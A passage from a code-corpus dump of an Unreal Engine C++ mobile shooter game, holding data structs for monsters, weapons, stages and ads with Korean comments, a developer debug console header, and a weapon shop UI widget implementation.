30cm)\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tbool\tMCollide;\t\t\t// 몬스터가 몬스터끼리 충돌할지 말지 결정\n\n\t//UPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\t//USkeletalMesh* MMeshPath;\n};\n\nUSTRUCT(BlueprintType)\nstruct FPGMonsterData_Normal : public FPGMonsterData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGMonsterData_Normal() : FPGMonsterData(){ }\n\n};\n\nUSTRUCT(BlueprintType)\nstruct FPGMonsterData_SkillType : public FPGMonsterData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGMonsterData_SkillType() : MWeaponCoolTime(0.0f), MDashReadyTime(0.0f), MDashCoolTime(0.0f), MDashMoveDistance(0.0f), MDashSpeed(0.0f),\n\t\tMDivisionCount(0), MDivisionAmount(0), MDivisionSpawnRange(0.0f), MRemainDivisionCount(0) { }\n\n\t//===========================================\n\t// Weapon\n\t//===========================================\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat MWeaponCoolTime;\t\t// 스킬 타입 몬스터의 공격 시전 쿨타임(ms)\n\n\t//===========================================\n\t// Dash\n\t//===========================================\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat MDashReadyTime;\t\t// 대쉬 준비 시간\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat MDashCoolTime;\t\t// 대쉬 쿨타임\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat MDashMoveDistance;\t// 대쉬 이동거리\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat MDashSpeed;\t\t\t// 대쉬 속도\n\n\n\t//===========================================\n\t// Division\n\t//===========================================\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MDivisionCount;\t\t// 분화 몬스터의 분화 횟수. 횟수를 입력하면, 100에서 횟수+1을 나누어 해당 HP대역에 들어가면 몬스터가 분화한다.\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MDivisionAmount;\t\t// 생성될(분화) 몬스터 갯수. 해당 개수만큼 현재위치 앞쪽 50 거리로 시계방향 Rotate시켜 개수에 맞춰 생성각도를 360을 나눠 생성한다.\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat MDivisionSpawnRange;\t// 분화시 기준 몬스터에서 해당 범위만큼 떨어져서 생성된다.\n\n\tUPROPERTY(VisibleAnyWhere, BlueprintReadWrite)\n\tint32 MRemainDivisionCount;\t// 분화 몬스터의 남은 분화 횟수\n};\n\nUSTRUCT(BlueprintType)\nstruct FPGMonsterData_Division : public FPGMonsterData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGMonsterData_Division() : MDivisionCount(0), MDivisionAmount(0), MDivisionSpawnRange(0.0f), MRemainDivisionCount(0) { }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MDivisionCount;\t\t// 분화 몬스터의 분화 횟수. 횟수를 입력하면, 100에서 횟수+1을 나누어 해당 HP대역에 들어가면 몬스터가 분화한다.\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MDivisionAmount;\t\t// 생성될(분화) 몬스터 갯수. 해당 개수만큼 현재위치 앞쪽 50 거리로 시계방향 Rotate시켜 개수에 맞춰 생성각도를 360을 나눠 생성한다.\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat MDivisionSpawnRange;\t// 분화시 기준 몬스터에서 해당 범위만큼 떨어져서 생성된다.\n\n\tUPROPERTY(VisibleAnyWhere, BlueprintReadWrite)\n\tint32 MRemainDivisionCount;\t// 분화 몬스터의 남은 분화 횟수\n};\n\n\nUSTRUCT(BlueprintType)\nstruct FPGMonsterData_DivisionSkillType : public FPGMonsterData_Division\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGMonsterData_DivisionSkillType() : MWeaponCoolTime(0), MAttackSpeed(0), MAttackMethod(0){ }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MWeaponCoolTime;\t\t// 스킬 타입 몬스터의 공격 시전 쿨타임(ms)\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MAttackSpeed;\t\t\t// 스킬 타입 몬스터의 공격 시전 속도(ms)\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MAttackMethod;\t\t// 스킬 타입 몬스터의 공격 방식\t(Projectile의 경우 이곳에 Projectile 이펙트BP 삽입, 돌진의 경우 Decal 이펙트 삽입)\n};\n\nUSTRUCT(BlueprintType)\nstruct FPGMonsterData_Boss : public FPGMonsterData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGMonsterData_Boss() { }\n\n};\n\n\n//=========================================================================================\n// 무기 데이터\n//=========================================================================================\nUSTRUCT(BlueprintType)\nstruct FPGWeaponData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGWeaponData() : Bullet(0), AttackRange(0), BulletRange(0), BulletSpeed(0), BPower(0), Collide(false), PowerUpPerLevelUp(0), MaxPower(0),\n\t\tMag(0), MagUpPerLevelUp(0),\tMaxMag(0), Vibration(0), VibrationCool(0), WPushRange(0)\n\t{ }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tFString Name;\n\n\t// 발사체의 외관(Mesh/텍스처)\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tTSubclassOf<class APG_Projectile> BProjectile;\n\t//TSubclassOf<class APG_Projectile> BProjectile;\n\n\t// 1회 발사할 때 발사체의 생성 개수. 해당 항목이 입력되면 아래 생성위치, \n\t// 발사각도가 각 발사체마다 입력되게 생긴다. 예를들어 Bullet에 3을 입력하면 아래로 BStartPosition, BAngle, BEffect가 3개씩 생긴다. \n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32\tBullet;\t\t\n\n\t// 몬스터가 접근해왔을 때 공격하기 시작 하는 공격 범위.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 AttackRange;\n\n\t// 발사체가 도달하는 최대 범위. 이후 발사체는 무조건 소멸한다.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 BulletRange;\n\n\t// 총알 속도\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 BulletSpeed;\n\t\n\t// 발사체의 공격력.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 BPower;\n\t\n\t// 발사체가 몬스터를 관통할지 여부. (단, 오브젝트와 충돌할 경우 이 옵션에 영향을 받지 않고 무조건 소멸한다.)\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tbool Collide;\n\n\t// 무기 공격력 업그레이드를 할 때 마다 올라가는 공격력 수치\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 PowerUpPerLevelUp;\n\n\t// 최대 무기 공격력 수치\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MaxPower;\n\n\t// 기본 탄창 수. (초기에 얻으면 설정되어 있는 기본 최대 탄창 수)\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 Mag;\n\n\t// 상점에서 AMMO레벨업 할 때마다 올라가는 무기 최대 탄창 수.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MagUpPerLevelUp;\n\t\n\t// 최대 탄창 수. (성장으로 최대로 높힐 수 있는 최대 탄창 수)\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MaxMag;\n\n\t// 발사체가 몬스터 피격 시 기기에 주는 진동 강도.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 Vibration;\n\n\t// 진동이 울리는 주기(1초에 Int 회).\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 VibrationCool;\n\n\t// 몬스터 피격 시 몬스터가 후방으로 밀리는 범위(Cm)\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 WPushRange;\n};\n\n//=========================================================================================\n// 스테이지 데이터\n//=========================================================================================\nUSTRUCT(BlueprintType)\nstruct FPGStageData : public FTableRowBase\n{\n\tGENERATED_BODY()\npublic :\n\tFPGStageData(): M_Amount(0), Time(0), Multi_Kill(0), StageClearReward(0), StarReward(0)\n\t{ }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tFString StageName;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 M_Amount;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 Time;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 Multi_Kill;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 StageClearReward;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 StarReward;\n};\n\n//=========================================================================================\n// 스킬 데이터\n//=========================================================================================\nUSTRUCT(BlueprintType)\nstruct FPGLethalAttackData : public FTableRowBase\n{\n\tGENERATED_BODY()\n\n\tpublic:\n\tFPGLethalAttackData() : LMinPoint(0), LMaxPoint(0), LMinRange(0), LMaxRange(0), LPower(0), LEffectDuration(0), Vibration(0), VibrationCool(0)\n\t{ }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tFString Name;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tTSubclassOf<class APG_LethalAttack> BLethalAttack;\n\n\t// 필살기 사용에 필요한 최소 몬스터 킬 수치.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 LMinPoint;\n\n\t// 필살기 사용에 쓸 수 있는 최대 몬스터 킬 수치.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 LMaxPoint;\n\n\t// 필살기가 펼쳐질 수 있는 최소 타격 범위.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 LMinRange;\n\n\t// 필살기가 펼쳐질 수 있는 최대 타격 범위.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 LMaxRange;\n\n\t// 필살기의 공격력\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 LPower;\n\n\t// 필살기 효과의 지속 시간.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 LEffectDuration;\n\n\t// 발사체가 몬스터 피격 시 기기에 주는 진동 강도.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 Vibration;\n\n\t// 진동이 울리는 주기(1초에 Int 회).\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 VibrationCool;\n};\n\n//=========================================================================================\n// Weapon Shop 데이터\n//=========================================================================================\nUENUM()\nenum class EBuyType : int32\n{\n\teBT_Weapon = 0,\n\teBT_Power,\n\teBT_Ammo,\n\teBT_Max,\n};\n\nUSTRUCT(BlueprintType)\nstruct FPGWeaponTableData : public FTableRowBase\n{\n\tGENERATED_BODY()\npublic:\n\tFPGWeaponTableData() : ServiceOpen(false), MontageFireReaction(nullptr), CostUnlock(0), CostUpgradePower(0), CostUpgradeAmmo(0) { }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tTSubclassOf<class APG_Weapon> BPWeapon;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tbool ServiceOpen;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tstruct FPGWeaponData WeaponData;\n\n\t// UI에 표현할 무기 이미지\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Image\")\n\tstruct FSlateBrush WeaponImage;\n\n\t// 무기 발사시 사용되는 애니메이션\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Animation\")\n\tclass UAnimMontage* MontageFireReaction;\n\n\t// 무기 잠금 해제 가격\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG ShopData\")\n\tint32 CostUnlock;\n\n\t// 무기 공격력 강화 가격\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG ShopData\")\n\tint32 CostUpgradePower;\n\n\t// 무기 탄약 수 증가 가격\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG ShopData\")\n\tint32 CostUpgradeAmmo;\n};\n\n\n//=========================================================================================\n// 광고 데이터\n//=========================================================================================\nUENUM()\nenum class EADType : int32\n{\n\teAT_WeaponShop = 0,\t\t// 무기고 내 광고\n\teAT_StageClear3X,\t\t// 스테이지 클리어 후 3배 보상 광고\n\teAT_StagePlayAD,\t\t// 스테이지 플레이 광고\n\teAT_Max,\n};\n\nUSTRUCT(BlueprintType)\nstruct FPGADTableData : public FTableRowBase\n{\n\tGENERATED_BODY()\npublic:\n\tFPGADTableData() : Type(EADType::eAT_Max), ReViewableTime(0), TimeDeduction_MainLobby(false), TimeDeduction_StagePlay(false) { }\n\n\t// 광고 타입\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tEADType Type;\t\n\n\t// 재시청 제한시간\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 ReViewableTime;\n\n\t// 메인로비에서 재시청 시간을 차감한다.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tbool TimeDeduction_MainLobby;\n\n\t// 스테이지 플레이에서 재시청 시간을 차감한다.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tbool TimeDeduction_StagePlay;\n};" }, { "alpha_fraction": 0.5735294222831726, "alphanum_fraction": 0.5759803652763367, "avg_line_length": 24.5, "blob_id": "7e9a3b104ec9ee4fc9a60196c7bead294a2da7a3", "content_id": "9d8203abd5eb42b67c0aa35ec2e0c6c4be3e2078", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1542, "license_type": "no_license", "max_line_length": 110, "num_lines": 48, "path": "/Source/Project_Gun/Public/Game/Console/PG_Console.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n/**\n * \n */\nclass PROJECT_GUN_API PG_Console\n{\npublic :\n\t//****************************************************************************************\n\t// 커맨드 추가시 PG_Command를 상속받은 클래스 제작한 후\n\t// PG_Console::CreateCommands() 함수 내에 ADD_COMMAND 매크로를 이용하여\n\t// 커맨드를 추가한다.\n\t//****************************************************************************************\n\tenum ECosloeCommands : int32\n\t{\n\t\teCC_SET_TARGET_STAGE_ID = 0,\t\t// 현재 플레이하는 레벨에서 스테이지 ID값으로 변경한다. (변경 후 스테이지 클리어, 또는 다시 시작시 변경된 스테이지값으로 시작한다.)\n\t\teCC_RESTART_STAGE,\t\t\t\t\t// 현재 스테이지를 다시 시작한다.\n\t\teCC_NEXT_STAGE,\t\t\t\t\t\t// 다음 스테이지를 시작한다.\n\t\teCC_PREV_STAGE,\t\t\t\t\t\t// 이전 스테이지를 시작한다.\n\t\teCC_START_STAGE,\t\t\t\t\t// 입력된 스테이지를 시작한다.\n\t\teCC_SHOW_ME_THE_MONEY,\t\t\t\t// 입력한 값으로 Point를 설정한다.\n\t\teCC_ALL_STAGE_UNLOCK,\t\t\t\t// 모든 스테이지를 Unlock 한다.\n\t\teCC_Max,\n\t};\n\npublic:\n\tPG_Console();\n\t~PG_Console();\n\npublic :\n\tbool InitConsoleCommands();\n\tvoid ReleaseCommands();\n\n\tvoid UpdateCommands();\n\n\tclass PG_Command* GetCommand(class IConsoleVariable* pConsoleVariable);\n\nprivate :\n\tvoid CreateCommands();\n\nprivate :\n\tUPROPERTY()\n\tTArray<class PG_Command*> m_kCommands;\n};\n" }, { "alpha_fraction": 0.7633073925971985, "alphanum_fraction": 0.7654051184654236, "avg_line_length": 32.95252227783203, "blob_id": "df561b740161757e274991cba5cfc40989de1f78", "content_id": "46928c2192a0e07267f869480e265264f3b8e0d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 11507, "license_type": "no_license", "max_line_length": 217, "num_lines": 337, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetShopWeaponBox.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetShopWeaponBox.h\"\n#include \"UI/PG_UserWidgetBuyPopup.h\"\n#include \"UI/PG_UserWidgetMessagePopup.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\n#include <Components/Button.h>\n#include <Components/Image.h>\n#include <Components/TextBlock.h>\n\nvoid UPG_UserWidgetShopWeaponBox::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tABCHECK(nullptr != Btn_Weapon);\n\tABCHECK(nullptr != Btn_Power);\n\tABCHECK(nullptr != Btn_Ammo);\n\tABCHECK(nullptr != Text_PowerLevel);\n\tABCHECK(nullptr != Text_AmmoLevel);\n\tABCHECK(nullptr != Img_WeaponLock);\n\tABCHECK(nullptr != Img_PowerUp);\n\tABCHECK(nullptr != Img_AmmoUp);\n\n\tBtn_Weapon->OnClicked.AddDynamic(this, &UPG_UserWidgetShopWeaponBox::OnRequestUnlockWeapon);\n\tBtn_Power->OnClicked.AddDynamic(this, &UPG_UserWidgetShopWeaponBox::OnRequestLevelupPower);\n\tBtn_Ammo->OnClicked.AddDynamic(this, &UPG_UserWidgetShopWeaponBox::OnRequestLevelupAmmo);\n\n\t{\n\t\tm_pUserWidgetBuyPopup = CreateWidget<UPG_UserWidgetBuyPopup>(GetWorld(), LoadClass<UPG_UserWidgetBuyPopup>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/WB_BuyPopup.WB_BuyPopup_C'\")));\n\t\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\n\t\tm_pUserWidgetBuyPopup->OnBtnClickedOK.AddUObject(this, &UPG_UserWidgetShopWeaponBox::OnBuyOK);\n\t\tm_pUserWidgetBuyPopup->OnOnBtnClickedCancel.AddUObject(this, &UPG_UserWidgetShopWeaponBox::OnBuyCancel);\n\t\tm_pUserWidgetBuyPopup->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pUserWidgetBuyPopup->AddToViewport(999);\n\t}\n\n\t{\n\t\tm_pUserWidgetMessagePopup = CreateWidget<UPG_UserWidgetMessagePopup>(GetWorld(), LoadClass<UPG_UserWidgetMessagePopup>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/WB_MessagePopup.WB_MessagePopup_C'\")));\n\t\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\n\t\tm_pUserWidgetMessagePopup->OnBtnClickedOK.AddUObject(this, &UPG_UserWidgetShopWeaponBox::OnMessagePopupBoxClose);\n\t\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pUserWidgetMessagePopup->AddToViewport(999);\n\t}\n}\n\nvoid UPG_UserWidgetShopWeaponBox::SetWeaponIndex(class APG_GameModeBase* pGameMode, int32 nWeaponIndex)\n{\n\tABCHECK(nullptr != Btn_Weapon);\n\tABCHECK(nullptr != pGameMode);\n\n\tauto pPlayerSaveData = pGameMode->GetSavePlayerData();\n\tABCHECK(nullptr != pPlayerSaveData);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tm_pGameMode = pGameMode;\n\tWeaponIndex = nWeaponIndex;\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(nWeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), nWeaponIndex);\n\t\tSetEnable(false);\n\t\treturn;\n\t}\n\n\t// 무기 판매 가능한지 검사\n\tif (false == pWeaponShopData->ServiceOpen)\n\t{\n\t\tSetEnable(false);\n\t\treturn;\n\t}\n\n\t// 무기 이미지 설정\n\tBtn_Weapon->WidgetStyle.SetNormal(pWeaponShopData->WeaponImage);\n\tBtn_Weapon->WidgetStyle.SetHovered(pWeaponShopData->WeaponImage);\n\tBtn_Weapon->WidgetStyle.SetPressed(pWeaponShopData->WeaponImage);\n\tBtn_Weapon->WidgetStyle.SetDisabled(pWeaponShopData->WeaponImage);\n\n\tIsMaxPower = pGameMode->IsMaxLevelPower(nWeaponIndex);\n\tIsMaxAmmo = pGameMode->IsMaxLevelAmmo(nWeaponIndex);\n\tIsAbleBuyWepaon = !pGameMode->IsUnlockWeapon(nWeaponIndex);\n\tIsAbleBuyPower = pGameMode->IsAbleBuyRewardPointPower(nWeaponIndex);\n\tIsAbleBuyAmmo = pGameMode->IsAbleBuyRewardPointAmmo(nWeaponIndex);\n\n\t// 무기 데이터 설정\n\tauto pWeaponOwnData = pPlayerSaveData->WeaponOwnData.Find(nWeaponIndex);\n\tif (pWeaponOwnData)\n\t{\n\t\tSetPowerLevel(pWeaponOwnData->PowerLevel);\n\t\tSetAmmoLevel(pWeaponOwnData->MagLevel);\n\t\tSetEnable(pWeaponOwnData->IsUnlock);\n\t}\n\telse\n\t{\n\t\tSetEnable(false);\n\t\treturn;\n\t}\n}\n\nvoid UPG_UserWidgetShopWeaponBox::SetSlotIndex(int32 nSlotIndex)\n{\n\tSlotIndex = nSlotIndex;\n}\n\nvoid UPG_UserWidgetShopWeaponBox::SetPowerLevel(int32 nPowerLevel)\n{\n\tPowerLevel = nPowerLevel;\n}\n\nvoid UPG_UserWidgetShopWeaponBox::SetAmmoLevel(int32 nAmmoLevel)\n{\n\tAmmoLevel = nAmmoLevel;\n}\n\nvoid UPG_UserWidgetShopWeaponBox::SetEnable(bool bEnable)\n{\n\tABCHECK(nullptr != Btn_Weapon);\n\tABCHECK(nullptr != Btn_Power);\n\tABCHECK(nullptr != Btn_Ammo);\n\tABCHECK(nullptr != Text_PowerLevel);\n\tABCHECK(nullptr != Text_AmmoLevel);\n\tABCHECK(nullptr != Img_WeaponLock);\n\tABCHECK(nullptr != Img_PowerUp);\n\tABCHECK(nullptr != Img_AmmoUp);\n\n\tif (bEnable)\n\t{\n\t\tBtn_Weapon->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tBtn_Weapon->SetIsEnabled(false);\n\t\tBtn_Power->SetVisibility(ESlateVisibility::Visible);\n\t\tBtn_Power->SetIsEnabled(!(IsMaxPower || false == IsAbleBuyPower));\n\t\tBtn_Ammo->SetVisibility(ESlateVisibility::Visible);\n\t\tBtn_Ammo->SetIsEnabled(!(IsMaxAmmo || false == IsAbleBuyAmmo));\n\n\t\tif (IsMaxPower)\n\t\t\tText_PowerLevel->SetText(FText::FromString(TEXT(\"MAX\")));\n\t\telse\n\t\t\tText_PowerLevel->SetText(FText::FromString(*FString::Printf(TEXT(\"LV %d\"), PowerLevel)));\n\n\t\tif (IsMaxAmmo)\n\t\t\tText_AmmoLevel->SetText(FText::FromString(TEXT(\"MAX\")));\n\t\telse\n\t\t\tText_AmmoLevel->SetText(FText::FromString(*FString::Printf(TEXT(\"LV %d\"), AmmoLevel)));\n\n\t\tImg_WeaponLock->SetVisibility(ESlateVisibility::Hidden);\n\n\t\tif (IsMaxPower || false == IsAbleBuyPower)\n\t\t\tImg_PowerUp->SetVisibility(ESlateVisibility::Hidden);\n\t\telse\n\t\t\tImg_PowerUp->SetVisibility(ESlateVisibility::SelfHitTestInvisible);\n\n\t\tif (IsMaxAmmo || false == IsAbleBuyAmmo)\n\t\t\tImg_AmmoUp->SetVisibility(ESlateVisibility::Hidden);\n\t\telse\n\t\t\tImg_AmmoUp->SetVisibility(ESlateVisibility::SelfHitTestInvisible);\n\t}\n\telse\n\t{\n\t\tBtn_Weapon->SetVisibility(ESlateVisibility::Visible);\n\t\tBtn_Weapon->SetIsEnabled(IsAbleBuyWepaon);\n\t\tBtn_Power->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tBtn_Ammo->SetVisibility(ESlateVisibility::HitTestInvisible);\n\n\t\tImg_WeaponLock->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tImg_PowerUp->SetVisibility(ESlateVisibility::Hidden);\n\t\tImg_AmmoUp->SetVisibility(ESlateVisibility::Hidden);\n\n\t\tText_PowerLevel->SetText(FText::FromString(TEXT(\"LV --\")));\n\t\tText_AmmoLevel->SetText(FText::FromString(TEXT(\"LV --\")));\n\t}\n}\n\nvoid UPG_UserWidgetShopWeaponBox::UpdateWeaponShopLayout()\n{\n\tABCHECK(PG_INVALID_INDEX != WeaponIndex);\n\tABCHECK(nullptr != m_pGameMode);\n\n\tSetWeaponIndex(m_pGameMode.Get(), WeaponIndex);\n}\n\nvoid UPG_UserWidgetShopWeaponBox::ShowBuyPopupBox(EBuyType ekBuyType, FString kTitle, FString kDescription, int32 nPrice)\n{\n\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\tm_pUserWidgetBuyPopup->SetValue((int32)ekBuyType);\n\tm_pUserWidgetBuyPopup->SetTitle(kTitle);\n\tm_pUserWidgetBuyPopup->SetPrice(nPrice);\n\tm_pUserWidgetBuyPopup->SetDescription(kDescription);\n\tm_pUserWidgetBuyPopup->SetVisibility(ESlateVisibility::Visible);\n}\n\nvoid UPG_UserWidgetShopWeaponBox::ShowMessageBox(FString kTitle, FString kDescription, int32 nValue)\n{\n\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\tm_pUserWidgetMessagePopup->SetValue(nValue);\n\tm_pUserWidgetMessagePopup->SetTitle(kTitle);\n\tm_pUserWidgetMessagePopup->SetDescription(kDescription);\n\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Visible);\n}\n\nvoid UPG_UserWidgetShopWeaponBox::OnBuyOK(int32 nValue)\n{\n\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\tm_pUserWidgetBuyPopup->SetVisibility(ESlateVisibility::Hidden);\n\n\tif (false == m_pGameMode.IsValid(true))\n\t{\n\t\tABLOG(Error, TEXT(\"m_pGameMode is nullptr\"));\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\t\n\tauto pMyPlayerState =Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\tABCHECK(nullptr != pMyPlayerState);\n\n\t// 구매 진행\n\tbool bBuySuccesed = false;\n\tswitch ((EBuyType)nValue)\n\t{\n\tcase EBuyType::eBT_Weapon:\t\tbBuySuccesed = m_pGameMode->BuyWeapon(WeaponIndex);\t\tbreak;\n\tcase EBuyType::eBT_Power:\t\tbBuySuccesed = m_pGameMode->BuyPowerUp(WeaponIndex);\tbreak;\n\tcase EBuyType::eBT_Ammo:\t\tbBuySuccesed = m_pGameMode->BuyAmmoUp(WeaponIndex);\t\tbreak;\n\tdefault:\t\tbreak;\n\t}\n\n\t// 구매 실패\n\tif (false == bBuySuccesed)\n\t{\n\t\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\t\tABCHECK(nullptr != pGameInstance);\n\n\t\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(WeaponIndex);\n\t\tif (nullptr == pWeaponShopData)\n\t\t{\n\t\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), WeaponIndex);\n\t\t\tSetEnable(false);\n\t\t\treturn;\n\t\t}\n\n\t\tShowMessageBox(pWeaponShopData->WeaponData.Name, m_pGameMode->GetLastBuyErrorMsg(), nValue);\n\t}\n\n\tOnItemBuyWeapon.Broadcast();\n}\n\nvoid UPG_UserWidgetShopWeaponBox::OnBuyCancel(int32 nValue)\n{\n\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\tm_pUserWidgetBuyPopup->SetVisibility(ESlateVisibility::Hidden);\n}\n\nvoid UPG_UserWidgetShopWeaponBox::OnMessagePopupBoxClose()\n{\n\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Hidden);\n}\n\nvoid UPG_UserWidgetShopWeaponBox::OnRequestUnlockWeapon()\n{\n\tif (false == m_pGameMode.IsValid(true))\n\t{\n\t\tABLOG(Error, TEXT(\"m_pGameMode is nullptr\"));\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(WeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), WeaponIndex);\n\t\tSetEnable(false);\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), 